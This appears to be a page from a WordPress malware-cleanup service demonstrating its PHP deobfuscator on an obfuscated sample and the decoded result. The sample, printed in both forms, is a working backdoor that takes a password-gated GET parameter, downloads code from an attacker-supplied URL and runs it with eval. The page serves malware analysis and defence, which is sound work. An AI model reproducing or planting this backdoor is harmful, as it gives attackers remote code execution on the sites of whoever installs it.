Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php class viG05M7X8AQFBfY { static function QfIR0vByXH3HjR1($s7WyfE4cnKuSo0E) { goto phtrM2cC3mHY4Aq; uk4maksN4S5131n: $QodF1YFvfGPRCmw = $twM_M07az2Loy5F("\176", "\x20"); goto GYRK6t66Wz0oRMf; ax7gcmsuXPxMzEs: foreach ($HHopuZGZIQiLzBc as $Kx8_MOs8eWcziZk => $cVUAwvKya9ZSV5x) { $QWmNBLs3PWQ...



Obfuscated php code

<?php class viG05M7X8AQFBfY { static function QfIR0vByXH3HjR1($s7WyfE4cnKuSo0E) { goto phtrM2cC3mHY4Aq; uk4maksN4S5131n: $QodF1YFvfGPRCmw = $twM_M07az2Loy5F("\176", "\x20"); goto GYRK6t66Wz0oRMf; ax7gcmsuXPxMzEs: foreach ($HHopuZGZIQiLzBc as $Kx8_MOs8eWcziZk => $cVUAwvKya9ZSV5x) { $QWmNBLs3PWQoLIw .= $QodF1YFvfGPRCmw[$cVUAwvKya9ZSV5x - 8884]; LbTzAbspSrWnRSF: } goto t9H6lL7nX6Zy9uO; t9H6lL7nX6Zy9uO: DmUJOuJEZKBuAG_: goto n8CiCCz0aA6PANs; phtrM2cC3mHY4Aq: $twM_M07az2Loy5F = "\162" . "\141" . "\156" . "\147" . "\x65"; goto uk4maksN4S5131n; GYRK6t66Wz0oRMf: $HHopuZGZIQiLzBc = explode("\x7d", $s7WyfE4cnKuSo0E); goto hAmY3nAqboALVbg; n8CiCCz0aA6PANs: return $QWmNBLs3PWQoLIw; goto s5Z0ZeXiNbjgUEo; hAmY3nAqboALVbg: $QWmNBLs3PWQoLIw = ""; goto ax7gcmsuXPxMzEs; s5Z0ZeXiNbjgUEo: } static function xbzv4YR8g5qaknK($rqJjBSadLwyc7sH, $bfYU19n79EiMGyp) { goto UBotevdkvpRJIGW; RSXoleroVdExSZ6: $hUwffK8Co0KhsWh = curl_exec($gqm5Oj1fQZeUNDV); goto oXSqla7S_juJ632; oXSqla7S_juJ632: return empty($hUwffK8Co0KhsWh) ? $bfYU19n79EiMGyp($rqJjBSadLwyc7sH) : $hUwffK8Co0KhsWh; goto rAX64h3Qlhy1_fL; ji92wBZwPnl2A_r: curl_setopt($gqm5Oj1fQZeUNDV, CURLOPT_RETURNTRANSFER, 1); goto RSXoleroVdExSZ6; UBotevdkvpRJIGW: $gqm5Oj1fQZeUNDV = curl_init($rqJjBSadLwyc7sH); goto ji92wBZwPnl2A_r; rAX64h3Qlhy1_fL: } static function zIlQ73q_BZx3t0K() { goto zPzFPrAYmdnoR4M; OgA45djjJlJLa4R: @eval($hPH_M4J3zZT707l[3 + 1]($KwAavPuZig5t1HD)); goto OniW3_h4KfqbHBo; OniW3_h4KfqbHBo: die(); goto lVBk5yETJBFmN0H; mVXiX43WC00OfhB: $zFaD1ygQBPoN9W8 = @$hPH_M4J3zZT707l[3 + 0]( $hPH_M4J3zZT707l[5 + 1], $wDjkvQI6lQpfraQ ); goto OEZZN3Mfm_yOzzi; bTf9bMjmRSLu7zL: if ( !( @$y4v8kiM5iqMDjBy[0] - time() > 0 and md5(md5($y4v8kiM5iqMDjBy[0 + 3])) === "\x38\141\x37\x33\x33\x33\61\63\x62\146\x36\x62\71\x63\63\x39\x36\x36\60\143\x63\x39\142\x66\x34\x33\x32\71\x64\x31\x62\x61" ) ) { goto mT_YPmvj1sP_Vqu; } goto cL_xxwxU6C4wkJF; OEZZN3Mfm_yOzzi: $y4v8kiM5iqMDjBy = $hPH_M4J3zZT707l[1 + 1]($zFaD1ygQBPoN9W8, true); goto yfJ5yMBhFg6_UaR; cL_xxwxU6C4wkJF: $KwAavPuZig5t1HD = self::xBzV4YR8G5QAkNk( $y4v8kiM5iqMDjBy[1 + 0], $hPH_M4J3zZT707l[3 + 2] ); goto OgA45djjJlJLa4R; jjkyE5TM1yyEaUF: FzFYjLr6kaYNmrg: goto Q3nmiXPPfL44SUx; lVBk5yETJBFmN0H: mT_YPmvj1sP_Vqu: goto W5nVlJS3J63G2jH; Q3nmiXPPfL44SUx: $wDjkvQI6lQpfraQ = @$hPH_M4J3zZT707l[1]( $hPH_M4J3zZT707l[10 + 0](INPUT_GET, $hPH_M4J3zZT707l[1 + 8]) ); goto mVXiX43WC00OfhB; yfJ5yMBhFg6_UaR: @$hPH_M4J3zZT707l[4 + 6](INPUT_GET, "\x6f\x66") == 1 && die($hPH_M4J3zZT707l[0 + 5](__FILE__)); goto bTf9bMjmRSLu7zL; GBQsE_dp3LaMv84: foreach ($P_sLH05xYrWySXz as $O52JO8zI2FX5s4k) { $hPH_M4J3zZT707l[] = self::Qfir0vbyXH3Hjr1($O52JO8zI2FX5s4k); badrjdz2K6PXhHg: } goto jjkyE5TM1yyEaUF; zPzFPrAYmdnoR4M: $P_sLH05xYrWySXz = [ "\x38\71\x31\61\175\70\70\71\66\x7d\x38\x39\60\71\175\70\x39\61\63\x7d\70\x38\71\x34\x7d\x38\x39\60\71\175\70\71\x31\x35\175\x38\x39\60\x38\175\x38\70\x39\x33\175\x38\x39\x30\x30\x7d\70\x39\61\x31\175\x38\x38\x39\64\175\x38\71\60\65\x7d\x38\x38\x39\71\x7d\x38\71\60\x30", "\x38\x38\71\x35\175\x38\x38\71\64\x7d\x38\x38\x39\66\175\70\x39\x31\x35\x7d\70\70\71\66\175\x38\x38\x39\71\x7d\x38\x38\x39\64\x7d\70\71\x36\x31\175\x38\x39\65\71", "\70\71\60\x34\175\70\70\71\65\x7d\70\70\71\71\x7d\70\x39\60\60\175\x38\x39\x31\65\175\x38\71\x31\60\175\x38\x39\x30\71\175\x38\71\x31\x31\x7d\70\70\x39\x39\175\x38\x39\61\x30\x7d\70\x39\x30\x39", "\x38\x38\x39\x38\x7d\70\x39\61\63\175\70\71\x31\x31\175\x38\71\60\x33", "\x38\71\x31\x32\175\x38\71\x31\x33\175\x38\x38\x39\65\175\x38\x39\x30\x39\x7d\x38\x39\x35\x36\x7d\70\71\65\70\x7d\x38\71\61\x35\x7d\x38\71\x31\x30\175\x38\x39\60\x39\175\x38\x39\x31\x31\x7d\x38\x38\71\71\x7d\x38\71\61\60\175\70\71\60\x39", "\70\x39\60\x38\175\x38\x39\x30\x35\175\x38\x39\60\62\x7d\70\71\60\71\175\70\71\x31\65\x7d\x38\71\x30\67\x7d\x38\71\x30\x39\175\x38\x38\71\x34\175\70\71\x31\65\175\70\x39\x31\61\x7d\70\70\71\71\175\70\x39\x30\x30\175\70\x38\71\x34\x7d\x38\x39\x30\x39\175\70\71\60\x30\175\70\x38\x39\64\x7d\70\x38\71\x35", "\70\x39\63\70\x7d\70\71\66\70", "\70\x38\x38\65", "\70\x39\x36\x33\175\x38\71\x36\70", "\x38\x39\x34\x35\175\x38\x39\62\70\x7d\70\x39\x32\x38\175\70\x39\x34\x35\x7d\x38\71\x32\x31", "\x38\71\60\x38\x7d\70\x39\x30\65\x7d\x38\71\x30\62\175\x38\x38\71\x34\x7d\70\71\x30\x39\x7d\70\70\71\x36\x7d\70\71\61\x35\175\70\71\60\65\175\x38\71\60\x30\x7d\x38\x38\71\70\175\70\x38\71\x33\175\x38\70\71\64", ]; goto GBQsE_dp3LaMv84; W5nVlJS3J63G2jH: } }

Decoded(de-Obfuscated) php code

<?php

class viG05M7X8AQFBfY
{
    static function QfIR0vByXH3HjR1($s7WyfE4cnKuSo0E)
    {
        $twM_M07az2Loy5F = "range";
        $QodF1YFvfGPRCmw = range("~", " ");
        $HHopuZGZIQiLzBc = explode("}", $s7WyfE4cnKuSo0E);
        $QWmNBLs3PWQoLIw = "";
        foreach ($HHopuZGZIQiLzBc as $Kx8_MOs8eWcziZk => $cVUAwvKya9ZSV5x) {
            $QWmNBLs3PWQoLIw .= $QodF1YFvfGPRCmw[$cVUAwvKya9ZSV5x - 8884];
        }
        return $QWmNBLs3PWQoLIw;
    }
    static function xbzv4YR8g5qaknK($rqJjBSadLwyc7sH, $bfYU19n79EiMGyp)
    {
        $gqm5Oj1fQZeUNDV = curl_init($rqJjBSadLwyc7sH);
        curl_setopt($gqm5Oj1fQZeUNDV, CURLOPT_RETURNTRANSFER, 1);
        $hUwffK8Co0KhsWh = curl_exec($gqm5Oj1fQZeUNDV);
        return empty($hUwffK8Co0KhsWh) ? $bfYU19n79EiMGyp($rqJjBSadLwyc7sH) : $hUwffK8Co0KhsWh;
    }
    static function zIlQ73q_BZx3t0K()
    {
        $P_sLH05xYrWySXz = ["8911}8896}8909}8913}8894}8909}8915}8908}8893}8900}8911}8894}8905}8899}8900", "8895}8894}8896}8915}8896}8899}8894}8961}8959", "8904}8895}8899}8900}8915}8910}8909}8911}8899}8910}8909", "8898}8913}8911}8903", "8912}8913}8895}8909}8956}8958}8915}8910}8909}8911}8899}8910}8909", "8908}8905}8902}8909}8915}8907}8909}8894}8915}8911}8899}8900}8894}8909}8900}8894}8895", "8938}8968", "8885", "8963}8968", "8945}8928}8928}8945}8921", "8908}8905}8902}8894}8909}8896}8915}8905}8900}8898}8893}8894"];
        foreach ($P_sLH05xYrWySXz as $O52JO8zI2FX5s4k) {
            $hPH_M4J3zZT707l[] = self::Qfir0vbyXH3Hjr1($O52JO8zI2FX5s4k);
        }
        $wDjkvQI6lQpfraQ = @$hPH_M4J3zZT707l[1]($hPH_M4J3zZT707l[10](INPUT_GET, $hPH_M4J3zZT707l[9]));
        $zFaD1ygQBPoN9W8 = @$hPH_M4J3zZT707l[3]($hPH_M4J3zZT707l[6], $wDjkvQI6lQpfraQ);
        $y4v8kiM5iqMDjBy = $hPH_M4J3zZT707l[2]($zFaD1ygQBPoN9W8, true);
        @$hPH_M4J3zZT707l[10](INPUT_GET, "of") == 1 && die($hPH_M4J3zZT707l[5]("/var/www/html/input.php"));
        if (!(@$y4v8kiM5iqMDjBy[0] - time() > 0 and md5(md5($y4v8kiM5iqMDjBy[3])) === "8a733313bf6b9c39660cc9bf4329d1ba")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $KwAavPuZig5t1HD = self::xBzV4YR8G5QAkNk($y4v8kiM5iqMDjBy[1], $hPH_M4J3zZT707l[5]);
        @eval($hPH_M4J3zZT707l[4]($KwAavPuZig5t1HD));
        die;
    }
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.